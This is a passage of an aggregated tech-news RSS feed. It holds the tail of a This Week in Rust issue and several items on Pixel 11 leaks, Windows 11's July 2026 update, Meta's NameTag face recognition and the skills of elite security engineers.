<li><a href="https://www.meetup.com/rust-poland-meetup/events/315582674/"><strong>Rust Poland x Kraków #10</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Manchester, GB | <a href="https://www.meetup.com/rust-manchester/events/">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315037685/"><strong>Rust Manchester July Code Night</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
</ul>
</li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
</ul>
</li>
<li>2026-07-22 | New York, NY, US | <a href="https://www.meetup.com/rust-nyc/events/">Rust NYC</a><ul>
<li><a href="https://www.meetup.com/rust-nyc/events/315636854/"><strong>Rust NYC: Write A Custom Coding Agent and wasm_zero</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315582650/"><strong>Porter Square Rust Lunch, July 25</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl/events/">Rust Atlanta</a><ul>
<li><a href="https://www.meetup.com/rust-atl/events/313539329/"><strong>Rust-Atl</strong></a></li>
</ul>
</li>
<li>2026-08-01 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315582653/"><strong>Chinatown Rust Lunch, Aug 1</strong></a></li>
</ul>
</li>
<li>2026-08-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/314660176/"><strong>Evening Boston Rust Meetup at Red Hat, Aug 4</strong></a></li>
</ul>
</li>
<li>2026-08-06 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust/events/">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/314701905/"><strong>Shipping Temporal: How a Global Rust Ecosystem Built Chrome’s Newest Web API</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#south-america">South America</a></h5>
<ul>
<li>2026-08-08 | São Paulo, SP | <a href="https://luma.com/calendar/cal-bif2oHITU1aVvsr">Rust-SP</a><ul>
<li><a href="https://luma.com/41oiyhtk"><strong>Rust SP - Aug/2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a><ul>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a><ul>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne/events/">Rust Melbourne</a><ul>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039480/"><strong>Rust Melbourne July 2026</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>Thank you for your PR, but please edit the description like you are a chainsaw-wielding maniac that just discovered the sentences are young adults who came to the lake at summer camp after sunset.</p>
</blockquote>
<p>– <a href="https://github.com/rust-lang/rust/pull/159039#issuecomment-4931084997">workingjubilee on Rust github</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1786">Theemathas</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1uxsigp/this_week_in_rust_660/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s the Truth About Whether Meta’s NameTag Face Recognition Tech ‘Exists’]]></title>
<description><![CDATA[Since WIRED reported on Meta’s NameTag face recognition system, company executives have made confusing and conflicting remarks about its very existence. This article has been indexed from Security Latest Read the original article: Here’s the Truth About Whether Meta’s NameTag…
Read more →
The pos...]]></description>
<link>https://tsecurity.de/de/3671923/it-security-nachrichten/heres-the-truth-about-whether-metas-nametag-face-recognition-tech-exists/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671923/it-security-nachrichten/heres-the-truth-about-whether-metas-nametag-face-recognition-tech-exists/</guid>
<pubDate>Wed, 15 Jul 2026 23:39:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Since WIRED reported on Meta’s NameTag face recognition system, company executives have made confusing and conflicting remarks about its very existence. This article has been indexed from Security Latest Read the original article: Here’s the Truth About Whether Meta’s NameTag…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/heres-the-truth-about-whether-metas-nametag-face-recognition-tech-exists/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/heres-the-truth-about-whether-metas-nametag-face-recognition-tech-exists/">Here’s the Truth About Whether Meta’s NameTag Face Recognition Tech ‘Exists’</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s Pixel 11 Pro Fold vs. Pixel 10 Pro Fold]]></title>
<description><![CDATA[Following up on our comparison of the regular Pixel 11 series phones, we put together a Pixel 11 Pro Fold vs. Pixel 10 Pro Fold image to show differences we might see here as well. Like the Pixel 11, Pixel 11 Pro, and Pixel 11 Pro XL, the new Pixel 11 Pro Fold will showcase...
Read the original p...]]></description>
<link>https://tsecurity.de/de/3670992/it-nachrichten/heres-pixel-11-pro-fold-vs-pixel-10-pro-fold/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670992/it-nachrichten/heres-pixel-11-pro-fold-vs-pixel-10-pro-fold/</guid>
<pubDate>Wed, 15 Jul 2026 16:48:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Following up on our comparison of the regular Pixel 11 series phones, we put together a Pixel 11 Pro Fold vs. Pixel 10 Pro Fold image to show differences we might see here as well. Like the Pixel 11, Pixel 11 Pro, and Pixel 11 Pro XL, the new Pixel 11 Pro Fold will showcase...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/07/15/heres-pixel-11-pro-fold-vs-pixel-10-pro-fold/">Here’s Pixel 11 Pro Fold vs. Pixel 10 Pro Fold</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows bekommt jetzt viele neue Funktionen: Der große Überblick]]></title>
<description><![CDATA[Zum heutigen Patchday (der alle Rekorde sprengt) stopft Microsoft nicht nur eine Rekordzahl an Sicherheitslücken in seinen Produkten, sondern schaltet mit KB5101650 (Windows 11 25H2 Build 26200.8875 und Windows 11 24H3 Build 26100.8875) jetzt standardmäßig für Windows 11 viele neue Funktionen fre...]]></description>
<link>https://tsecurity.de/de/3669951/it-nachrichten/windows-bekommt-jetzt-viele-neue-funktionen-der-grosse-ueberblick/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669951/it-nachrichten/windows-bekommt-jetzt-viele-neue-funktionen-der-grosse-ueberblick/</guid>
<pubDate>Wed, 15 Jul 2026 10:03:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Zum heutigen <a href="https://www.pcwelt.de/article/3191057/microsofts-monster-patchday-sprengt-alle-rekorde.html" target="_blank" rel="noreferrer noopener">Patchday (der alle Rekorde sprengt)</a> stopft Microsoft nicht nur eine Rekordzahl an Sicherheitslücken in seinen Produkten, sondern schaltet mit KB5101650 (Windows 11 25H2 Build 26200.8875<strong> </strong>und Windows 11 24H3 Build 26100.8875) jetzt <strong>standardmäßig </strong>für Windows 11 viele neue Funktionen frei, die Sie bisher als optionale Updates manuell herunterladen mussten.</p>



<p>Die wohl spannendste Neuerung hört auf den Namen <strong>Point-in-Time Restore (PITR)</strong>, <a href="https://www.pcwelt.de/article/2978414/windows-11-bekommt-zwei-neue-wiederherstellungstools-pitr-cloud-rebuild.html" target="_blank" rel="noreferrer noopener">über die wir erstmals im November 2025 berichtet haben.</a> PITR ermöglicht es Ihnen, einen Wiederherstellungspunkt zu erstellen, zu dem Sie bei Bedarf zurückkehren können. Dabei handelt es sich um einen automatischen Wiederherstellungspunkt aus den letzten 72 Stunden.</p>



<p>Damit wird ein PC auf den genauen Zustand zurückgesetzt, in dem er sich zu einem früheren Zeitpunkt befand. Diese Wiederherstellungsmaßnahme soll bei der Behebung einer Vielzahl von Problemen helfen, darunter Probleme mit Updates, Treiberkonflikten und Konfigurationsfehlern.</p>



<p>Der große Unterschied zur aktuellen Systemwiederherstellung ist, dass mit PITR sogar lokale Dateien und Anwendungen wiederhergestellt werden können. Microsoft hat PITR monatelang in Insider-Versionen getestet, doch jetzt erreicht diese Systemwiederherstellungslösung das finale Windows 11.</p>



<p>Windows-Updates lassen sich jetzt endlich <a href="https://www.pcwelt.de/article/3113301/windows-update-zwang-vor-dem-ende-erste-nutzer-testen-neues-updates-pausieren-menue.html" target="_blank" rel="noreferrer noopener">bequem per <strong>Kalendereintrag bis zu 35 Tage verschieben</strong></a>. Microsoft<a href="https://www.pcwelt.de/article/3190273/microsoft-warnt-darum-sollten-sie-windows-updates-jetzt-zeitnah-installieren.html" target="_blank" rel="noreferrer noopener"> rät allerdings grundsätzlich davon ab, Updates lange hinauszuschieben.</a> <strong>Widgets verhalten sich jetzt unauffälliger</strong> und öffnen sich nicht mehr beim Mouse-over. Benachrichtigungen und Symbole zeigt die Taskleiste minimiert.</p>



<p>Der <a href="https://www.pcwelt.de/article/3179132/der-explorer-ist-nach-dem-neuen-update-schneller.html" target="_blank" rel="noreferrer noopener"><strong>Datei-Explorer soll jetzt schneller starten</strong></a> und Disk-Images schneller einbinden. Für den Bereich Bluetooth gibt es eine gleich eine Fülle von Verbesserungen. Weitere Optimierungen betreffen die Bildschirmtönung zur Entlastung der Augen, das Drucken übers Internet, die Sprachsteuerung und Spracheingabe und vieles mehr. Die US-amerikanische IT-Nachrichtenseite Windowslatest hat alle Verbesserungen <a href="https://www.windowslatest.com/2026/07/14/i-tested-windows-11-july-2026-patch-tuesday-updates-heres-everything-new-improved-and-fixed/">zusammengefasst</a>. Das offizielle<a href="https://support.microsoft.com/en-us/servicing/os/windows-11/2026/07/july-14-2026-kb5101650-os-builds-26200-8875-and-26100-8875"> Microsoft-Support-Dokument zu KB5101650 finden Sie wiederum hier.</a></p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading">Verfügbarkeit</h2>



<p>Wie immer schaltet Microsoft die neuen Features nach und nach auf den kompatiblen Windows-11-Rechnern frei. Sie dürfen also nicht damit rechnen, dass alle Neuerungen sofort mit Installation der Juli-2026-Updates auf Ihrem Rechner verfügbar sind. Lediglich die sicherheitsrelevanten Verbesserungen, also die vielen Patches sowie die neuen <a href="https://www.pcwelt.de/article/3188875/microsoft-bestaetigt-probleme-mit-secure-boot-update-auf-bestimmten-pcs-und-stoppt-rollout.html" target="_blank" rel="noreferrer noopener">Secure-Boot-Zertifikate</a>, gehen sofort an alle Rechner aus.</p>



<p>Sie erhalten KB5101650 und alle damit verbundenen Verbesserungen standardmäßig über die Windows-Update-Funktion auf Ihren Rechner installiert. Falls Sie sich KB5101650 manuell herunterladen wollen, finden Sie den <a href="https://www.catalog.update.microsoft.com/Search.aspx?q=KB5101650">Download hier im Microsoft Update Katalog.</a></p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[7 skills and traits of elite security engineers]]></title>
<description><![CDATA[Security engineers play a pivotal role in enterprise cybersecurity, because they are the professionals who design, build, and deploy security systems to protect an organization’s data, applications, systems, networks, and other IT components against a variety of cyber threats.



Finding not just...]]></description>
<link>https://tsecurity.de/de/3669835/it-security-nachrichten/7-skills-and-traits-of-elite-security-engineers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669835/it-security-nachrichten/7-skills-and-traits-of-elite-security-engineers/</guid>
<pubDate>Wed, 15 Jul 2026 09:08:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Security engineers play a pivotal role in enterprise cybersecurity, because they are the professionals who design, build, and deploy security systems to protect an organization’s data, applications, systems, networks, and other IT components against a variety of cyber threats.</p>



<p class="wp-block-paragraph">Finding not just qualified security engineers, but the best and brightest available, needs to be a priority for CISOs and others overseeing security at their organizations. That’s especially true with the rapid rise of AI and the threats that brings to the enterprise.</p>



<p class="wp-block-paragraph">Here are some of the key skills and traits of elite security engineers to look for when hiring — or to acquire in order to uplevel your cybersecurity career.</p>



<h2 class="wp-block-heading">Acumen with AI-powered tools</h2>



<p class="wp-block-paragraph">These days, AI-related skills are in demand regardless of domain, and this certainly applies to security engineers. There’s a wealth of solutions leveraging AI in the market, tools that engineers can add to their defense arsenal.</p>



<p class="wp-block-paragraph">“AI is transforming security engineering from reactive alerting to predictive threat detection,” says Praveen Margabandhu, digital engineering anchor at financial services firm Navy Federal Credit Union. “AI-driven anomaly detection now identifies behavioral patterns that indicate fraud or compromise before traditional threshold-based systems would fire. This shifts the security engineer’s role from incident responder to threat model designer.”</p>



<p class="wp-block-paragraph">AI-powered tools have taken over a large portion of the detection and triage work that used to be the core of a security engineer’s day, says Maruf Ahmed, cofounder and CEO of global tech staffing firm Dexian. “Vulnerability scanning runs on its own now,” he says. “Threat flagging that used to require a team pulling through logs for hours happens in minutes.”</p>



<p class="wp-block-paragraph">This has freed up capacity on most security teams and changed what the day-to-day work looks like, Ahmed says. “With detection increasingly automated, the engineer’s value sits more in interpreting what gets flagged and deciding what to do about it,” he says.</p>



<h2 class="wp-block-heading">Keen understanding of emerging and established AI threats</h2>



<p class="wp-block-paragraph">Engineers must also have a thorough understanding of the risks AI presents, including <strong><a href="https://www.csoonline.com/article/4154222/6-ways-attackers-abuse-ai-services-to-hack-your-business.html">AI-enhanced cyberattacks</a> using</strong><strong> </strong>large language models (LLMs) to automate and scale <a href="https://www.csoonline.com/article/3819176/top-5-ways-attackers-use-generative-ai-to-exploit-your-systems.html">highly personalized social engineering attacks</a>, craft sophisticated malware, and generate deepfakes.</p>



<p class="wp-block-paragraph">Other <a href="https://www.csoonline.com/article/4110008/top-cyber-threats-to-your-ai-systems-and-infrastructure.html">AI threats they need to be aware of</a> include prompt injections, data and model poisoning, disclosure of sensitive information, model theft, supply chain compromises, and excessive agency.</p>



<p class="wp-block-paragraph">“The same generative tools that help security teams work faster are available to adversaries, and it shows,” Ahmed says. “Phishing campaigns read better and land more precisely than they did a year ago. Social engineering is harder to catch when the language is polished and tailored to the target, and security engineers are now defending against threats built with the same class of technology they use on the defensive side.”</p>



<p class="wp-block-paragraph">That has raised the bar for what reliable detection looks like, Ahmed says. “The objective shift I hear most from clients is about trust in their own systems,” he says. “Two years ago, the priority was visibility — making sure you could see across your environment. Most organizations have that now. The harder problem is knowing whether what those tools are telling you holds up under scrutiny and having people on the team who can stand behind those findings in front of a regulator or a board.”</p>



<h2 class="wp-block-heading">Appreciation of performance and business goals</h2>



<p class="wp-block-paragraph">The best security engineers understand how performance and security intersect, says Margabandhu, who leads performance engineering across Navy Federal Credit Union’s digital banking infrastructure, including real-time fraud detection, identity and access management, and cybersecurity infrastructure resilience.</p>



<p class="wp-block-paragraph">“A fraud detection system that is secure but too slow to catch transactions in real-time is not secure at all,” Margabandhu says. “Elite engineers optimize for both simultaneously.”</p>



<p class="wp-block-paragraph">Engineers must be able to put things in business context, Ahmed says. “An engineer who can work across domains, validate AI outputs, and learn new tools fast is valuable. But that value compounds when the person also understands what the organization is trying to protect and why,” he says.</p>



<p class="wp-block-paragraph">Security engineers who understand the business make better risk decisions, write more effective policies, and generate less friction with the teams around them, Ahmed says. “That is the profile employers are hiring toward right now, and it is where the talent shortage is most pronounced,” he says.</p>



<h2 class="wp-block-heading">Systems mindset</h2>



<p class="wp-block-paragraph">“One of the biggest misconceptions in cybersecurity hiring is that elite security engineers are defined purely by technical certifications or tool familiarity,” says Juan Mathews Rebello Santos, an independent cybersecurity researcher and ethical hacker.</p>



<p class="wp-block-paragraph">“Technical skill absolutely matters, but the strongest engineers I’ve worked with consistently share a combination of analytical thinking, operational adaptability, communication ability, and deep systems understanding,” Santos says.</p>



<p class="wp-block-paragraph">Elite security engineers understand how infrastructure, cloud services, identity systems, applications, APIs, networks, users, and business operations connect, Santos says.</p>



<p class="wp-block-paragraph">“Modern attacks rarely target a single isolated component anymore,” he says. “Threat actors chain together weaknesses across environments. Engineers who can understand those relationships holistically are significantly more effective at both prevention and incident response.”</p>



<h2 class="wp-block-heading">Cross-disciplinary fluency and broad stack know-how</h2>



<p class="wp-block-paragraph">Being an elite software engineer today means having a range of technology experience and knowledge. “Organizations want engineers who can work across more of the stack than they used to,” Ahmed says. “A role that might have asked for deep specialization in one area now expects someone who can move between cloud infrastructure, application security, and compliance without needing a handoff at every boundary.”</p>



<p class="wp-block-paragraph">The attack surface has continued to get wider, and the job descriptions for security engineers has followed suit. “That cross-domain fluency matters because security incidents rarely stay contained in one layer,” Ahmed says. “The engineer who can follow a problem from the network through the application to the data governance framework resolves it faster, with fewer people involved.”</p>



<p class="wp-block-paragraph">The strongest security engineers bridge infrastructure, application, and business domains, Margabandhu says. “They can speak to a CISO, a developer, and a cloud architect in the same conversation,” he says. “An engineer who can explain what an authentication problem means for fraud exposure moves faster in a room full of executives than one who can only describe it in infrastructure terms. I’ve watched technically brilliant people lose that race repeatedly.”<br><br></p>



<p class="wp-block-paragraph">Having the ability to communicate technical risk clearly to non-technical leadership can mean the difference between success and failure of attacks.</p>



<p class="wp-block-paragraph">“Many security failures today are not caused by lack of tooling, but by misalignment between technical teams and business decision-makers,” Santos says. “Elite engineers can explain operational risk, prioritization, and security tradeoffs in language executives understand.”</p>



<h2 class="wp-block-heading">Deep understanding of third-party risk and non-human threats</h2>



<p class="wp-block-paragraph">Threats can come from anywhere, including supply chains and non-human combatants. Third-party cybersecurity risks are on the rise. The 2026 Global CISO Leadership Report by executive search firm Hitch Partners, based on a survey of more than 625 information security executives across the US and Canada, says 43% put third-party risks as the No. 1 priority.</p>



<p class="wp-block-paragraph">“Most teams are still better at securing what they own than securing what they depend on,” Margabandhu says. “The mental shift from perimeter thinking to dependency thinking is real and not everyone has made it. The engineers who treat <a href="https://www.csoonline.com/article/4148315/apis-are-the-new-perimeter-heres-how-cisos-are-securing-them.html">every API call</a>, every credentialed vendor, every third-party model as part of their attack surface approach design differently.”</p>



<p class="wp-block-paragraph">Another growing source of potential threats are not human. <a href="https://www.csoonline.com/article/2132294/what-are-non-human-identities-and-why-do-they-matter.html">Machine identities</a> now outnumber human identities by ratios exceeding 100 to 1 in most enterprise environments, with some sectors closer to 500 to 1, according to the ManageEngine Identity Security Outlook 2026 report.</p>



<p class="wp-block-paragraph">This includes service accounts, API keys, automation tokens, and AI agents, any one of which can present data governance and security risks.</p>



<p class="wp-block-paragraph">Many organizations are still managing machine identities through manual processes that weren’t designed for scale, Margabandhu says. “Engineers who understand non-human identity governance are rare and increasingly important. This is not a future problem.”<br><br></p>



<h2 class="wp-block-heading">Willingness to keep learning</h2>



<p class="wp-block-paragraph">Security engineers need to have a desire to never stopped learning.</p>



<p class="wp-block-paragraph">“That sounds obvious until you work with people who’ve been doing this for 15 years and are still operating from the same threat models they built in 2012,” Margabandhu says. “Security changes fast enough that standing still is the same as going backwards.”</p>



<p class="wp-block-paragraph">The security engineers who keep up aren’t reading one report a year. “They’re genuinely curious about what attackers are doing right now, this month, and they adjust how they think accordingly,” Margabandhu says. “That quality is harder to hire for than most technical skills, because it’s not on a resume.”<br><br></p>



<p class="wp-block-paragraph">With AI presenting new and more sophisticated threats, keeping up with the latest developments is perhaps more important than ever. “Strong engineers are naturally investigative,” Santos says. “They actively study attack techniques, test assumptions, reverse engineer failures, and continuously adapt their understanding of risk.”</p>



<p class="wp-block-paragraph">The best security engineers are often the people who remain intellectually uncomfortable because they know the landscape is always evolving, Santos says.</p>



<p class="wp-block-paragraph">Employers have started paying closer attention to how fast someone can learn, Ahmed says. “The threat landscape and the defensive toolkit are both moving faster than any certification program can track, so hiring managers are probing for adaptability in interviews: how candidates have responded to recent shifts, whether they have picked up unfamiliar platforms on their own, how they work through problems they have not seen before,” he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s Pixel 11 Pro vs. Pixel 10 Pro]]></title>
<description><![CDATA[We are still in a bit of shock after seeing the entire Pixel 11 series outed early yesterday, thanks to the slip-up of someone trying to get ahead of launch by posting listings for each phone early. It gave us a look at the Pixel 11, Pixel 11 Pro, and Pixel 11 Pro XL a...
Read the original post: ...]]></description>
<link>https://tsecurity.de/de/3668923/it-nachrichten/heres-pixel-11-pro-vs-pixel-10-pro/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668923/it-nachrichten/heres-pixel-11-pro-vs-pixel-10-pro/</guid>
<pubDate>Tue, 14 Jul 2026 20:49:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We are still in a bit of shock after seeing the entire Pixel 11 series outed early yesterday, thanks to the slip-up of someone trying to get ahead of launch by posting listings for each phone early. It gave us a look at the Pixel 11, Pixel 11 Pro, and Pixel 11 Pro XL a...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/07/14/heres-pixel-11-pro-vs-pixel-10-pro/">Here’s Pixel 11 Pro vs. Pixel 10 Pro</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I tested Windows 11 July 2026 Updates. Here’s everything new, improved, and fixed]]></title>
<description><![CDATA[Microsoft's Windows 11 July 2026 Patch Tuesday update (KB5101650) is now rolling out with Point-in-time restore, a faster File Explorer, major Bluetooth improvements, Secure Boot updates, accessibility features, networking fixes, and dozens of reliability improvements across the OS.
The post I te...]]></description>
<link>https://tsecurity.de/de/3668755/windows-tipps/i-tested-windows-11-july-2026-updates-heres-everything-new-improved-and-fixed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668755/windows-tipps/i-tested-windows-11-july-2026-updates-heres-everything-new-improved-and-fixed/</guid>
<pubDate>Tue, 14 Jul 2026 19:13:41 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft's Windows 11 July 2026 Patch Tuesday update (KB5101650) is now rolling out with Point-in-time restore, a faster File Explorer, major Bluetooth improvements, Secure Boot updates, accessibility features, networking fixes, and dozens of reliability improvements across the OS.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/07/14/i-tested-windows-11-july-2026-patch-tuesday-updates-heres-everything-new-improved-and-fixed/">I tested Windows 11 July 2026 Updates. Here’s everything new, improved, and fixed</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s the Pixel Watch 5]]></title>
<description><![CDATA[After the wild day we had yesterday, where Google’s entire Pixel 11 series showed up early on Amazon, we were sort of assuming the Pixel Watch 5 would make an appearance at any moment. Today, that has happened through renders that look believable. The Pixel Watch 5 can be see here and will report...]]></description>
<link>https://tsecurity.de/de/3668489/it-nachrichten/heres-the-pixel-watch-5/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668489/it-nachrichten/heres-the-pixel-watch-5/</guid>
<pubDate>Tue, 14 Jul 2026 17:35:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>After the wild day we had yesterday, where Google’s entire Pixel 11 series showed up early on Amazon, we were sort of assuming the Pixel Watch 5 would make an appearance at any moment. Today, that has happened through renders that look believable. The Pixel Watch 5 can be see here and will reportedly come...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/07/14/heres-the-pixel-watch-5/">Here’s the Pixel Watch 5</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[You paid me, a long-time Linux user, to use Windows 11 exclusively for a month: here’s how it went]]></title>
<description><![CDATA[submitted by    /u/BinkReddit   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3666762/linux-tipps/you-paid-me-a-long-time-linux-user-to-use-windows-11-exclusively-for-a-month-heres-how-it-went/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666762/linux-tipps/you-paid-me-a-long-time-linux-user-to-use-windows-11-exclusively-for-a-month-heres-how-it-went/</guid>
<pubDate>Tue, 14 Jul 2026 05:08:48 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/BinkReddit"> /u/BinkReddit </a> <br> <span><a href="https://www.osnews.com/story/145459/you-paid-me-a-long-time-linux-user-to-use-windows-11-exclusively-for-a-month-heres-how-it-went/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uvqf2k/you_paid_me_a_longtime_linux_user_to_use_windows/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s the Pixel 11 Series in a All Colors, Prices Revealed]]></title>
